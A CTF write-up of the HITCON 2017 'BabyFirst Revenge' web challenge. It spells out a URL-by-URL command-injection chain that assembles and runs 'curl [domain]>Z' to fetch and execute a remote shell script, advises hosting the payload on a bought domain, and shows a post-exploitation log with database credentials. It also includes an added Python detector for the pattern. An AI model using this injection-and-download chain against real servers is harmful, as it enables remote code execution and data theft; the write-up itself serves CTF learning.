[HITCON] (Web) BabyFirst Revenge

王一航
2017.11.06 12:26

Do you remember BabyFirst from HITCON CTF 2015?
This is the harder version!
http://52.199.204.34/


For a challenge like this, let me go straight to how to solve it.
Two methods are known:

  1. ls -t>[FILENAME]  (credit: @zblee)
  2. curl [DOMAIN]>[FILENAME]  (credit: @rebirth, respect)


Solution 1:

Reference article:

https://www.leavesongs.com/SHARE/some-tricks-from-my-secret-group.html

Exploit:

https://gist.github.com/WangYihang/281fda47bbf7c74fd4e0e34bb5c45454


Solution 2:

http://52.199.204.34/?cmd=>cur\
http://52.199.204.34/?cmd=>l\ \
http://52.199.204.34/?cmd=>vvv\
http://52.199.204.34/?cmd=>xx\
http://52.199.204.34/?cmd=>x.x\
http://52.199.204.34/?cmd=>y\
http://52.199.204.34/?cmd=>z\>\
http://52.199.204.34/?cmd=>Z
http://52.199.204.34/?cmd=sh Z

The limitation of this method is the domain name: you need to buy a domain whose letters come in a particular alphabetical order, so that the filename pieces line up correctly when listed.


After buying it, add an A record, start a web server, and make the home page the shell script you want executed.
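From the defender's side, the same request sequence is easy to spot in web access logs. The following is an added triage example (not code from the write-up or its linked exploit): it decodes the cmd parameter per client, flags a run of bare `>NAME` commands (which only create empty files) that is followed by an `sh` or `ls` call, and shows what those filenames spell once a listing of them is run through the shell. The log lines and client IPs are constructed, and all function names are my own.

```python
import re
from urllib.parse import parse_qs, urlsplit
# Constructed access-log lines modelled on the request sequence in the
# write-up; the client IPs are documentation-range placeholders.
SAMPLE_LOG = """\
198.51.100.7 - - [06/Nov/2017:12:00:01 +0800] "GET /?cmd=%3Ecur%5C HTTP/1.1" 200 12
198.51.100.7 - - [06/Nov/2017:12:00:02 +0800] "GET /?cmd=%3El%5C%20%5C HTTP/1.1" 200 12
198.51.100.7 - - [06/Nov/2017:12:00:03 +0800] "GET /?cmd=%3Evvv%5C HTTP/1.1" 200 12
198.51.100.7 - - [06/Nov/2017:12:00:04 +0800] "GET /?cmd=%3Exx%5C HTTP/1.1" 200 12
198.51.100.7 - - [06/Nov/2017:12:00:05 +0800] "GET /?cmd=%3Ex.x%5C HTTP/1.1" 200 12
198.51.100.7 - - [06/Nov/2017:12:00:06 +0800] "GET /?cmd=%3Ey%5C HTTP/1.1" 200 12
198.51.100.7 - - [06/Nov/2017:12:00:07 +0800] "GET /?cmd=%3Ez%5C%3E%5C HTTP/1.1" 200 12
198.51.100.7 - - [06/Nov/2017:12:00:08 +0800] "GET /?cmd=%3EZ HTTP/1.1" 200 12
198.51.100.7 - - [06/Nov/2017:12:00:09 +0800] "GET /?cmd=sh%20Z HTTP/1.1" 200 12
203.0.113.9 - - [06/Nov/2017:12:00:10 +0800] "GET /?cmd=id HTTP/1.1" 200 40
"""
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/[\d.]+"')

def extract_cmds(log_text):
    """Yield (client_ip, decoded cmd) for every request carrying ?cmd=."""
    for m in filter(None, map(LOG_RE.match, log_text.splitlines())):
        qs = parse_qs(urlsplit(m.group(2)).query, keep_blank_values=True)
        for cmd in qs.get("cmd", []):
            yield m.group(1), cmd

def shell_word(word):
    """Unescape a bare shell word ('\\x' -> 'x'); a lone trailing backslash stays literal."""
    out, i = "", 0
    while i < len(word):
        if word[i] == "\\" and i + 1 < len(word):
            out, i = out + word[i + 1], i + 2
        else:
            out, i = out + word[i], i + 1
    return out

def reassemble(names):
    """What the filenames spell when a listing of them is fed to sh: the shell
    drops each backslash-newline pair, so names ending in '\\' glue onto the
    next line. Joined in request order (the attacker's intended order); the
    real ls order depends on -t vs alphabetical sort and on the server locale."""
    return "\n".join(names).replace("\\\n", "")

def find_file_assembly(log_text, min_pieces=3):
    """Flag clients that issue a run of bare '>NAME' commands and then call sh/ls."""
    pieces, findings = {}, []
    for ip, cmd in extract_cmds(log_text):
        if cmd.startswith(">"):
            pieces.setdefault(ip, []).append(shell_word(cmd[1:]))
        elif len(pieces.get(ip, [])) >= min_pieces and re.match(r"(sh|ls)\b", cmd):
            findings.append({"ip": ip, "trigger": cmd, "pieces": pieces[ip],
                             "assembled": reassemble(pieces[ip])})
    return findings
```

Running `find_file_assembly(SAMPLE_LOG)` on the constructed log returns one finding for 198.51.100.7 whose assembled script reads `curl vvvxxx.xyz>Z`, which is the download step the write-up's sequence builds.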


Steps after getting a shell

[sniper]=>cat /home/fl4444g/*
[-] Unsupported function!
[+] Executing command on target server...
[+] Result : 
Flag is in the MySQL database
fl4444g / SugZXUtgeJ52_Bvr
mysqldump: [Warning] Using a password on the command line interface can be insecure.
mysqldump: Got error: 1044: Access denied for user 'fl4444g'@'%' to database 'fl4gdb' when using LOCK TABLES
-- MySQL dump 10.13  Distrib 5.7.20, for Linux (x86_64)
--
-- Host: localhost    Database: 
-- ------------------------------------------------------
-- Server version	5.7.20-0ubuntu0.16.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Current Database: `fl4gdb`
--

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `fl4gdb` /*!40100 DEFAULT CHARACTER SET latin1 */;

USE `fl4gdb`;

It threw an error:

mysqldump: Got error: 1044: Access denied for user 'fl4444g'@'%' to database 'fl4gdb' when using LOCK TABLES

Time was tight during the contest, so I didn't look into why; I just googled a fix and moved on to other challenges.

Fix: https://michaelrigart.be/mysqldump-1044-access-denied-using-lock-tables/

$ mysqldump --single-transaction -u user -p DBNAME > backup.sql

Reference documentation: https://dev.mysql.com/doc/refman/5.7/en/mysqldump.html


http://blog.csdn.net/u013983450/article/details/52179442
